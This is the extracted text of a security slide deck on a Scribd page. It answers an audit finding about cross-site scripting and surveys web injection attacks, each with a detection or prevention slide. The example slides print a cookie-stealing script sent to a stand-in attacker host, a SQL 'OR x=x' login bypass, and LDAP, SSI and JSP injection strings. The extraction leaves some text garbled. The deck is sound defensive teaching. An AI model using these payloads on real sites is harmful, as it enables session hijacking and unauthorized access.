Scribd Logo
Upload

Welcome to Scribd!

  • Web Audit Vulnerability

    Uploaded by

    Alper Kayısı
    48 views34 pages
    Cross-site scripting (xss) concerns by Ron Widitz Independent security audit Regulatory compliance XSS issue raised Must provide a response. XSS forces a website to execute malicious code in browser browser user is the intended victim. Account hijacking, keystroke recording, intranet hacking, theft XSS concept Auditor finding Freeform edit box message to Customer Service Immediate reflection : phishing DOMDOM-based : 95 JavaScript methods Redirection : header, meta

    Original Description:

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PPT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Cross-site scripting (xss) concerns by Ron Widitz Independent security audit Regulatory compliance XSS issue raised Must provide a response. XSS forces a website to execute malicious code in browser browser user is the intended victim. Account hijacking, keystroke recording, intranet hacking, theft XSS concept Auditor finding Freeform edit box message to Customer Service Immediate reflection : phishing DOMDOM-based : 95 JavaScript methods Redirection : header, meta

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PPT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    48 views34 pages

    Web Audit Vulnerability

    Uploaded by

    Alper Kayısı
    Cross-site scripting (xss) concerns by Ron Widitz Independent security audit Regulatory compliance XSS issue raised Must provide a response. XSS forces a website to execute malicious code in browser browser user is the intended victim. Account hijacking, keystroke recording, intranet hacking, theft XSS concept Auditor finding Freeform edit box message to Customer Service Immediate reflection : phishing DOMDOM-based : 95 JavaScript methods Redirection : header, meta

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PPT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 34

    Web Audit Vulnerability

    crosscross-site scripting (XSS) concerns by Ron Widitz

    Business Problem
       

    Independent security audit Regulatory compliance XSS issue raised Must provide a response

    Audit Response
    

    Either:
    Prove issue to be a non-problem nonor

    Describe actions to take

    Resolution Steps
        

    Investigate security concerns Restate as IT problem(s) Determine solution(s) Provide audit response Mitigate risk

    Investigation
       

    Define cross-site scripting (XSS) crossExamine how auditors applied Identify risks Research preliminary solutions

    crosscross-site scripting
     

     

    Attacker goal: their code into browser XSS forces a website to execute malicious code in browser Browser user is the intended victim Why? Account hijacking, keystroke recording, intranet hacking, theft

    XSS concept

    Auditor finding
     

    Freeform edit box Message to Customer Service

    XSS types
         

    Immediate reflection : phishing DOMDOM-based : 95 JavaScript methods Redirection : header, meta, dynamic Multimedia : Flash, QT, PDF scripts CrossCross-Site Request Forgery (CSRF) others
    (e.g. non-persistent search box) non-

    Risks
        

    XSS abuses render engines or plug-ins plugSteal browser cookies Steal session info for replay attack Malware or bot installation Redirect or phishing attempt

    Our actual risk


       

    Currently, none. Edit box info viewed in thick client DHTML or JavaScript needs browser Our thick client is Java Swing-based Swing-

    Planned Audit Response


        

    Could indicate no audit problem Might have future impact Address through dev standards Consider application firewall Widen problem scope to include all user agent injection tactics

    More on Web Attacks


         

    Cross Site Scripting SQL Injection XPATH Injection LDAP Injection SSI (server side inclusion) Injection JSP (Java server pages) Injection

    Artifacts
    

    For each injection issue:


    Vulnerability description documented Preventative coding technique

    Discuss with App Dev teams


    Publish and socialize direction Include in peer reviews/code walkthroughs Set deadlines for full incorporation

    Communicate with auditors

    Cross Site Scripting Example 1


     

    Trudy posts the following JavaScript on a message board: <SCRIPT> document.location='http://trudyhost/cgidocument.location='http://trudyhost/cgibin/ stealcookie.cgi?'+document.cookie </SCRIPT> When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

    Cross Site Scripting Example 2


     

    Trudy sends a link to the following URL to Bob that will take him to a personalized page: http://host/personalizedpage.php?username=<scri pt>document.location='http://trudyhost/cgipt>document.location='http://trudyhost/cgibin/stealcookie.cgi?'+document.cookie</script> A page is returned that contains the malicious script instead of the username Bob, and Bob s browser executes the script causing his session cookie to be sent to Trudy Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

    Cross Site Scripting Detection


    

    A client usually is not supposed to send scripts to servers


    If the server receives <SCRIPT> or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred

    A sanitized script could look like &ls;SCRIPT&gt;

    SQL Injection Example


    

    Trudy accesses Bob s website; in which he does not validate input on his sign in form Runs a SQL statement like the following: SELECT * from Accounts where username = USER_NAME and password = USER_PASS ; In the password field, she types as her password: X OR x = x Manipulates the server into running the following SQL command: SELECT * from Accounts where username = USER_NAME and password= X OR x = x ; Selects all account information

    SQL Injection Detection


    

    To detect and prevent this at Bob s location


    Log any traffic from Trudy to Bob containing form data containing a quotation mark Match any outgoing SQL statements from Bob s web server to his database server and verify that the quotation marks Trudy supplied were escaped If they weren t, take action

    XPATH Injection Example


     

    Similar to SQL injection Bob has a form that does not sanitize useruserprovided input before using it as part of an XPATH query::
    string(//user[name/text()= USER_NAME' and password/text()= USER_PASS']/account/text())

    Trudy again can provide the following password to change the statement s logic:
    X OR x = x The statement thus selects the first account

    LDAP Injection Example


    

    Server using LDAP for authentication


    User name initialized, but then uses unchecked user input to create a query

    filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry  Attacker can exploit using special characters http://example/ldapsearch.asp?user=*

    LDAP Injection Detection


    

    Detection is based off of usage of special LDAP characters


    System monitors input for special characters Either scrubs incoming input or watches for unescaped output passed to database server

    Detection approach is blackbox

    SSI Injection Example


    Bob has his server configured to use ServerServerSide Includes  Trudy passes input with an SSI embedded <!--#INCLUDE VIRTUAL="/web.config"--> <!--#INCLUDE VIRTUAL="/web.config"-->  SSI inserts malicious code into normal webpages upon next request  Future legitimate users get content containing the tainted code included by the SSI
    

    SSI Injection Detection


    

    Bob s system needs SSI enabled, so he uses our system on local servers
    SSI code can be detected by its specific format
    

    HTML comment (<!-- -->) containing a command (<!-- -->)

    SSI commands can be stripped on ingress Can also deny outgoing packets that do not include SSI as inputted (means successful execution)
    

    Detection approach is blackbox

    JSP Injection Example


     

    Similar to SSI injection Bob has a portal server configured to use dynamic code for templates Trudy passes input with an embedded <jsp:include http://bad.com/1.jsp > malicious code inserted into webpage

    JSP Injection Prevention


        

    Prefer static include <%include > Don t allow file inclusion outside of server via Java2 Security policies Firewall rules to prevent outbound requests from server Input validation coding Choose portal software not requiring dynamic includes or code execution

    Defense Approaches
    

    Web firewall/IDS
    ModSecurity for Apache Commercial: SecureSphere from Impervia

    Static code analysis


    Open source: Nikto Commercial:
     

    Acutenix Web Vulnerability Scanner N-stalker

    Education on good coding


    HTML encoding on input (server-side) (serverInput validation/filtering

    Q&A
    

    Suggestions?

    Backup Slides

    user agent injection


         

    Stored HTTP Response Splitting SQL Injection XML Injection JSP Code Injection LDAP Injection

    Approaches
     

      

    Application firewall HTML encoding on input (server(server-side) Input validation/filtering Coding techniques with output Session key enforced to prevent CSRF

    XPATH Injection Detection


    

    Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries Correction can again be done by escaping any rogue quotation marks Trudy may have inserted Detection approach is blackbox

    You might also like